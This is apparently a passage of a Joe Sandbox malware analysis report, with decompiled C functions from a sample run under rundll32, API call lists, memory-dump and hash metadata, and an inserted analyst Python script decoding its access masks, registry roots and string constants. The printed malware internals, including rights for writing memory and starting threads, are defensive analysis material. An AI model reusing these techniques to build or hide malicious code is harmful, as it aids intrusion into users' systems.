                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: cc3c1d34c609a1164d52da2c5ce285a882b3410854d61373ca6ef780663fab5f
                                                  • Instruction ID: 2cd82e6a80de5b4dfb6f2f596eb688809ae1b1afa511db174c45edf5f9475d17
                                                  • Opcode Fuzzy Hash: cc3c1d34c609a1164d52da2c5ce285a882b3410854d61373ca6ef780663fab5f
                                                  • Instruction Fuzzy Hash: BA517C7262020AFFDF11EFA0DC89EAABBBAFF48210F008415FA5596590D731D925DB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
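Decoding the raw constants in the two functions above (an added analyst helper; this is not part of the Joe Sandbox report and not code recovered from the sample). E052D8F10 opens its own process (the PID comes from GetCurrentProcessId) with the desired-access mask 0x0010047A, and E052D17D5 picks the registry root handle 0x80000002 or 0x80000003 and references strings that the decompiler shows only as DWORD comments (0x4d4c4b48, 0x55434b48, 0x74666f53, 0x65696c43). The script expands the access mask into PROCESS_* rights, maps predefined root handles to HKEY_* names and reads the DWORD comments back as little-endian ASCII. The only assumptions are the standard winnt.h/winreg.h values; the sample listing embedded in the script is a constructed excerpt of the decompiled lines, not the full function.

```python
"""Decode constants that appear in the decompilation of the sample.

Added helper for reading the report; it is not code from the report or
from the sample. Bit values are the standard winnt.h / winreg.h ones.
"""
import re
import struct
from typing import Dict, List, Optional

# PROCESS_* access rights from winnt.h (assumed standard values).
PROCESS_RIGHTS = {
    0x00000001: "PROCESS_TERMINATE",
    0x00000002: "PROCESS_CREATE_THREAD",
    0x00000004: "PROCESS_SET_SESSIONID",
    0x00000008: "PROCESS_VM_OPERATION",
    0x00000010: "PROCESS_VM_READ",
    0x00000020: "PROCESS_VM_WRITE",
    0x00000040: "PROCESS_DUP_HANDLE",
    0x00000080: "PROCESS_CREATE_PROCESS",
    0x00000100: "PROCESS_SET_QUOTA",
    0x00000200: "PROCESS_SET_INFORMATION",
    0x00000400: "PROCESS_QUERY_INFORMATION",
    0x00000800: "PROCESS_SUSPEND_RESUME",
    0x00001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}

# Predefined registry root handles from winreg.h (assumed standard values).
REG_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA",
    0x80000005: "HKEY_CURRENT_CONFIG",
}


def decode_access_mask(mask: int) -> List[str]:
    """Expand an OpenProcess desired-access mask into named rights.

    Bits without a known name are returned as a hex remainder so that
    nothing in the mask is silently dropped.
    """
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    known = 0
    for bit in PROCESS_RIGHTS:
        known |= bit
    leftover = mask & ~known
    if leftover:
        names.append(f"0x{leftover:08x}")
    return names


def reg_root_name(handle: int) -> str:
    """Name a predefined registry root handle, or echo it as hex."""
    return REG_ROOTS.get(handle, f"0x{handle:08x}")


def dword_to_ascii(value: int) -> Optional[str]:
    """Read a 32-bit constant as the four little-endian bytes it was
    loaded from; return None unless all four are printable ASCII."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


# Constructed excerpt of the decompiled lines of E052D17D5 and E052D52F9.
SAMPLE_LISTING = """\
_t16 = _t65 + 0x52de8fe; // 0x65696c43
_t35 = _t72 + 0x52dea5f; // 0x4d4c4b48
_t34 = _t72 + 0x52de89f; // 0x55434b48
_t44 = _t75 + 0x52de871; // 0x74666f53
_t5 = _t102 + 0x52de038; // 0x3050f485
"""

# A trailing decompiler comment of the form "// 0x........".
COMMENT_CONST = re.compile(r"//\s*(0x[0-9a-fA-F]{1,8})\b")


def decode_comment_constants(listing: str) -> Dict[str, Optional[str]]:
    """Map every '// 0x...' decompiler comment to its ASCII reading (or None)."""
    out: Dict[str, Optional[str]] = {}
    for hexstr in COMMENT_CONST.findall(listing):
        value = int(hexstr, 16)
        out[f"0x{value:08x}"] = dword_to_ascii(value)
    return out


if __name__ == "__main__":
    print("OpenProcess 0x0010047A ->", " | ".join(decode_access_mask(0x0010047A)))
    for root in (0x80000002, 0x80000003):
        print(f"root 0x{root:08x} -> {reg_root_name(root)}")
    for const, text in decode_comment_constants(SAMPLE_LISTING).items():
        print(f"{const} -> {text!r}")
```

0x0010047A expands to PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION and SYNCHRONIZE, the rights needed to write memory and start a thread in the opened process; here the PID passed is the sample's own. Note that 0x80000003 is HKEY_USERS, not HKEY_CURRENT_USER: E052D17D5 selects that root only in the branch that first copies a SID-like string of 9 to 217 characters containing no '_' in front of the path, which is how a per-user key is addressed without impersonating the user. The DWORD comments read "Clie", "HKLM", "HKCU" and "Soft"; 0x3050f485 from E052D52F9 is not printable and is left as None.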

                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 052D1680
                                                  • SysFreeString.OLEAUT32(?), ref: 052D1763
                                                    • Part of subcall function 052D52F9: SysAllocString.OLEAUT32(052DC2B0), ref: 052D5349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 052D17B7
                                                  • SysFreeString.OLEAUT32(?), ref: 052D17C5
                                                    • Part of subcall function 052D2436: Sleep.KERNEL32(000001F4), ref: 052D247E
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: 9e6f8729cdd22ddf4a5261ce0a512151720f1193eb168adbfa86714056723d22
                                                  • Instruction ID: 545cc5144e32761cc9a31c87c979fd7e6b0034af6573b20f509ee39537b0c06f
                                                  • Opcode Fuzzy Hash: 9e6f8729cdd22ddf4a5261ce0a512151720f1193eb168adbfa86714056723d22
                                                  • Instruction Fuzzy Hash: 52517676A1420AEFDB40DFE4D8888AEF7B6FF88350B148828E505EB260D7319D55CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E052D52F9(intOrPtr* __eax) {
                                                  				void* _v8;
                                                  				WCHAR* _v12;
                                                  				void* _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v32;
                                                  				intOrPtr _v40;
                                                  				short _v48;
                                                  				intOrPtr _v56;
                                                  				short _v64;
                                                  				intOrPtr* _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t57;
                                                  				intOrPtr* _t58;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr* _t63;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr* _t67;
                                                  				intOrPtr* _t69;
                                                  				intOrPtr* _t71;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr _t78;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t86;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t108;
                                                  				void* _t117;
                                                  				void* _t121;
                                                  				void* _t122;
                                                  				intOrPtr _t129;
                                                  
                                                  				_t122 = _t121 - 0x3c;
                                                  				_push( &_v8);
                                                  				_push(__eax);
                                                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                  				if(_t117 >= 0) {
                                                  					_t54 = _v8;
                                                  					_t102 =  *0x52dd27c; // 0x202a5a8
                                                  					_t5 = _t102 + 0x52de038; // 0x3050f485
                                                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                  					_t56 = _v8;
                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                  					if(_t117 >= 0) {
                                                  						__imp__#2(0x52dc2b0);
                                                  						_v28 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_t117 = 0x8007000e;
                                                  						} else {
                                                  							_t60 = _v32;
                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                  							_t86 = __imp__#6;
                                                  							_t117 = _t61;
                                                  							if(_t117 >= 0) {
                                                  								_t63 = _v24;
                                                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                  								if(_t117 >= 0) {
                                                  									_t129 = _v20;
                                                  									if(_t129 != 0) {
                                                  										_v64 = 3;
                                                  										_v48 = 3;
                                                  										_v56 = 0;
                                                  										_v40 = 0;
                                                  										if(_t129 > 0) {
                                                  											while(1) {
                                                  												_t67 = _v24;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t122 = _t122;
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												asm("movsd");
                                                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                  												if(_t117 < 0) {
                                                  													goto L16;
                                                  												}
                                                  												_t69 = _v8;
                                                  												_t108 =  *0x52dd27c; // 0x202a5a8
                                                  												_t28 = _t108 + 0x52de0bc; // 0x3050f1ff
                                                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                  												if(_t117 >= 0) {
                                                  													_t74 = _v16;
                                                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                  													if(_t117 >= 0 && _v12 != 0) {
                                                  														_t78 =  *0x52dd27c; // 0x202a5a8
                                                  														_t33 = _t78 + 0x52de078; // 0x76006f
                                                  														if(lstrcmpW(_v12, _t33) == 0) {
                                                  															_t82 = _v16;
                                                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                  														}
                                                  														 *_t86(_v12);
                                                  													}
                                                  													_t76 = _v16;
                                                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                  												}
                                                  												_t71 = _v8;
                                                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                  												_v40 = _v40 + 1;
                                                  												if(_v40 < _v20) {
                                                  													continue;
                                                  												}
                                                  												goto L16;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								L16:
                                                  								_t65 = _v24;
                                                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                  							}
                                                  							 *_t86(_v28);
                                                  						}
                                                  						_t58 = _v32;
                                                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                  					}
                                                  				}
                                                  				return _t117;
			}

                                                  APIs
                                                  • SysAllocString.OLEAUT32(052DC2B0), ref: 052D5349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 052D542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D5444
                                                  • SysFreeString.OLEAUT32(?), ref: 052D5473
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 96b93a426e2536a3a7e9059e9294133f677d584662a59e541c44674cd511e070
                                                  • Instruction ID: 093565423777821af6d4bd0e05d3cfb837f2b9ad4ba604e5aa52cc2e21b069f6
                                                  • Opcode Fuzzy Hash: 96b93a426e2536a3a7e9059e9294133f677d584662a59e541c44674cd511e070
                                                  • Instruction Fuzzy Hash: A8512D75E00519EFCB00DFA8C8889AEF7BAFF88705B148594E915EB250DB719D01CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E052D1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				void _v92;
                                                  				void _v236;
                                                  				void* _t55;
                                                  				unsigned int _t56;
                                                  				signed int _t66;
                                                  				signed int _t74;
                                                  				void* _t76;
                                                  				signed int _t79;
                                                  				void* _t81;
                                                  				void* _t92;
                                                  				void* _t96;
                                                  				signed int* _t99;
                                                  				signed int _t101;
                                                  				signed int _t103;
                                                  				void* _t107;
                                                  
                                                  				_t92 = _a12;
                                                  				_t101 = __eax;
                                                  				_t55 = E052DA7AA(_a16, _t92);
                                                  				_t79 = _t55;
                                                  				if(_t79 == 0) {
                                                  					L18:
                                                  					return _t55;
                                                  				}
                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                  				_t81 = 0;
                                                  				_t96 = 0x20;
                                                  				if(_t56 == 0) {
                                                  					L4:
                                                  					_t97 = _t96 - _t81;
                                                  					_v12 = _t96 - _t81;
                                                  					E052D968F(_t79,  &_v236);
                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E052D8967(_t101,  &_v236, _a8, _t96 - _t81);
                                                  					E052D8967(_t79,  &_v92, _a12, _t97);
                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                  					_t66 = E052D968F(_t101, 0x52dd1b0);
                                                  					_t103 = _t101 - _t79;
                                                  					_a8 = _t103;
                                                  					if(_t103 < 0) {
                                                  						L17:
                                                  						E052D968F(_a16, _a4);
                                                  						E052D1D6C(_t79,  &_v236, _a4, _t97);
                                                  						memset( &_v236, 0, 0x8c);
                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                  						goto L18;
                                                  					}
                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                  					do {
                                                  						if(_v8 != 0xffffffff) {
                                                  							_push(1);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push( *_t99);
                                                  							L052DB0C8();
                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                  							asm("adc edx, esi");
                                                  							_push(0);
                                                  							_push(_v8 + 1);
                                                  							_push(_t92);
                                                  							_push(_t74);
                                                  							L052DB0C2();
                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                  								_t74 = _t74 | 0xffffffff;
                                                  								_v16 = _v16 & 0x00000000;
                                                  							}
                                                  						} else {
                                                  							_t74 =  *_t99;
                                                  						}
                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                  						_a12 = _t74;
                                                  						_t76 = E052D1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                  						while(1) {
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							L13:
                                                  							_t92 =  &_v92;
                                                  							if(E052D8B62(_t79, _t92, _t106) < 0) {
                                                  								break;
                                                  							}
                                                  							L14:
                                                  							_a12 = _a12 + 1;
                                                  							_t76 = E052D9100(_t79,  &_v92, _t106, _t106);
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						_a8 = _a8 - 1;
                                                  						_t66 = _a12;
                                                  						_t99 = _t99 - 4;
                                                  						 *(0x52dd1b0 + _a8 * 4) = _t66;
                                                  					} while (_a8 >= 0);
                                                  					_t97 = _v12;
                                                  					goto L17;
                                                  				}
                                                  				while(_t81 < _t96) {
                                                  					_t81 = _t81 + 1;
                                                  					_t56 = _t56 >> 1;
                                                  					if(_t56 != 0) {
                                                  						continue;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				goto L4;
			}

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 052D10C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 052D10DA
                                                  • memset.NTDLL ref: 052D117A
                                                  • memset.NTDLL ref: 052D118A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
• Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: ba0d754adc1d9d27e75fa1ca3951f9e601af30203b5b5b1ca7ef36e49dc1570c
                                                  • Instruction ID: fc0d6e2d9ccb7160450737a2f632a5b8d6ce00ab1abacc770acc1238bccb6c7e
                                                  • Opcode Fuzzy Hash: ba0d754adc1d9d27e75fa1ca3951f9e601af30203b5b5b1ca7ef36e49dc1570c
                                                  • Instruction Fuzzy Hash: BF419571B20249ABDB10EFA8DC44FEEB775EF44310F108529F91AA7180D7719D54CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 052DA9BD
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • ResetEvent.KERNEL32(?), ref: 052DAA31
                                                  • GetLastError.KERNEL32 ref: 052DAA54
                                                  • GetLastError.KERNEL32 ref: 052DAAFF
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 680b1900675e3f36c2a08e846b5159b4a42ef91637b59e94c54b50d95de965c1
                                                  • Instruction ID: eaeb38c7da3f1b77ba10282bf1b79bdf5e8105fdcc94dd1413d7a3d997e0f867
                                                  • Opcode Fuzzy Hash: 680b1900675e3f36c2a08e846b5159b4a42ef91637b59e94c54b50d95de965c1
                                                  • Instruction Fuzzy Hash: 55415C72921605BBDB219FA5DC8DEABBFBDEF45710B104A19F146E10D0EB71E944CA30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E052D39BF(void* __eax, void* __ecx) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __esi;
                                                  				intOrPtr _t36;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t39;
                                                  				void* _t53;
                                                  				long _t58;
                                                  				void* _t59;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t59 = __eax;
                                                  				_t58 = 0;
                                                  				ResetEvent( *(__eax + 0x1c));
                                                  				_push( &_v8);
                                                  				_push(4);
                                                  				_push( &_v20);
                                                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  				if( *0x52dd134() != 0) {
                                                  					L5:
                                                  					if(_v8 == 0) {
                                                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                  						L21:
                                                  						return _t58;
                                                  					}
                                                  					 *0x52dd168(0, 1,  &_v12);
                                                  					if(0 != 0) {
                                                  						_t58 = 8;
                                                  						goto L21;
                                                  					}
                                                  					_t36 = E052D2049(0x1000);
                                                  					_v16 = _t36;
                                                  					if(_t36 == 0) {
                                                  						_t58 = 8;
                                                  						L18:
                                                  						_t37 = _v12;
                                                  						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                  						goto L21;
                                                  					}
                                                  					_push(0);
                                                  					_push(_v8);
                                                  					_push( &_v20);
                                                  					while(1) {
                                                  						_t39 = _v12;
                                                  						_t56 =  *_t39;
                                                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                  						ResetEvent( *(_t59 + 0x1c));
                                                  						_push( &_v8);
                                                  						_push(0x1000);
                                                  						_push(_v16);
                                                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  						if( *0x52dd134() != 0) {
                                                  							goto L13;
                                                  						}
                                                  						_t58 = GetLastError();
                                                  						if(_t58 != 0x3e5) {
                                                  							L15:
                                                  							E052D9039(_v16);
                                                  							if(_t58 == 0) {
                                                  								_t58 = E052D7A07(_v12, _t59);
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t58 = E052D1C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						L13:
                                                  						_t58 = 0;
                                                  						if(_v8 == 0) {
                                                  							goto L15;
                                                  						}
                                                  						_push(0);
                                                  						_push(_v8);
                                                  						_push(_v16);
                                                  					}
                                                  				}
                                                  				_t58 = GetLastError();
                                                  				if(_t58 != 0x3e5) {
                                                  					L4:
                                                  					if(_t58 != 0) {
                                                  						goto L21;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t58 = E052D1C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                  				if(_t58 != 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  				goto L4;
                                                  			}


                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 052D39D5
                                                  • GetLastError.KERNEL32 ref: 052D39EE
                                                    • Part of subcall function 052D1C47: WaitForMultipleObjects.KERNEL32(00000002,052DAA72,00000000,052DAA72,?,?,?,052DAA72,0000EA60), ref: 052D1C62
                                                  • ResetEvent.KERNEL32(?), ref: 052D3A67
                                                  • GetLastError.KERNEL32 ref: 052D3A82
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 911195f59f41c4d5d28dd5d5a5d1d1b0db3d70e2d3841a305a0e31fdce2cf2c3
                                                  • Instruction ID: fa8aae7292eaaa00fd3d30a4abbf21783900f13844ed7bba6fcac6b31b37ec72
                                                  • Opcode Fuzzy Hash: 911195f59f41c4d5d28dd5d5a5d1d1b0db3d70e2d3841a305a0e31fdce2cf2c3
                                                  • Instruction Fuzzy Hash: A431E932B20605ABCB11DBA4DC44E6EF7BAFF94260F100928F55AE7190EB74E941CB31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 052D3B46
                                                  • SysAllocString.OLEAUT32(052D1885), ref: 052D3B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D3B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D3BAB
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: b7f59209b0de83587606b6ea9ced474ac14e3dd285d344015e1792832390a61b
                                                  • Instruction ID: e01259c213dd81a50e553a04291d366731370128bc1ba560b5fe65a62470cfb6
                                                  • Opcode Fuzzy Hash: b7f59209b0de83587606b6ea9ced474ac14e3dd285d344015e1792832390a61b
                                                  • Instruction Fuzzy Hash: 4F312FB2924109EFCB05CF98D8C48AEBBB9FF58350B10882DF50AA7250D7759545CF72
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E052D42EA(signed int _a4, signed int* _a8) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				signed int _t6;
                                                  				intOrPtr _t8;
                                                  				intOrPtr _t12;
                                                  				short* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int* _t28;
                                                  				CHAR* _t30;
                                                  				long _t31;
                                                  				intOrPtr* _t32;
                                                  
                                                  				_t6 =  *0x52dd270; // 0xd448b889
                                                  				_t32 = _a4;
                                                  				_a4 = _t6 ^ 0x109a6410;
                                                  				_t8 =  *0x52dd27c; // 0x202a5a8
                                                  				_t3 = _t8 + 0x52de862; // 0x61636f4c
                                                  				_t25 = 0;
                                                  				_t30 = E052D7A9A(_t3, 1);
                                                  				if(_t30 != 0) {
                                                  					_t25 = CreateEventA(0x52dd2a8, 1, 0, _t30);
                                                  					E052D9039(_t30);
                                                  				}
                                                  				_t12 =  *0x52dd25c; // 0x4000000a
                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E052D757F() != 0) {
                                                  					L12:
                                                  					_t28 = _a8;
                                                  					if(_t28 != 0) {
                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                  					}
                                                  					_t31 = E052D205E(_t32, _t26);
                                                  					if(_t31 == 0 && _t25 != 0) {
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  					}
                                                  					if(_t28 != 0 && _t31 != 0) {
                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                  					}
                                                  					goto L20;
                                                  				} else {
                                                  					_t19 =  *0x52dd0f0( *_t32, 0x20);
                                                  					if(_t19 != 0) {
                                                  						 *_t19 = 0;
                                                  						_t19 = _t19 + 2;
                                                  					}
                                                  					_t31 = E052DA501(0,  *_t32, _t19, 0);
                                                  					if(_t31 == 0) {
                                                  						if(_t25 == 0) {
                                                  							L22:
                                                  							return _t31;
                                                  						}
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  						if(_t31 == 0) {
                                                  							L20:
                                                  							if(_t25 != 0) {
                                                  								CloseHandle(_t25);
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  			}


                                                  APIs
                                                    • Part of subcall function 052D7A9A: lstrlen.KERNEL32(052D23E9,00000000,00000000,00000027,00000005,00000000,00000000,052D96DA,74666F53,00000000,052D23E9,052DD00C,?,052D23E9), ref: 052D7AD0
                                                    • Part of subcall function 052D7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 052D7AF4
                                                    • Part of subcall function 052D7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 052D7AFC
                                                  • CreateEventA.KERNEL32(052DD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,052D3CA0,?,00000001,?), ref: 052D432B
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,052D3CA0,00000000,00000000,?,00000000,?,052D3CA0,?,00000001,?,?,?,?,052D6880), ref: 052D4389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,052D3CA0,?,00000001,?), ref: 052D43B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,052D3CA0,?,00000001,?,?,?,?,052D6880), ref: 052D43CF
                                                  Memory Dump Source
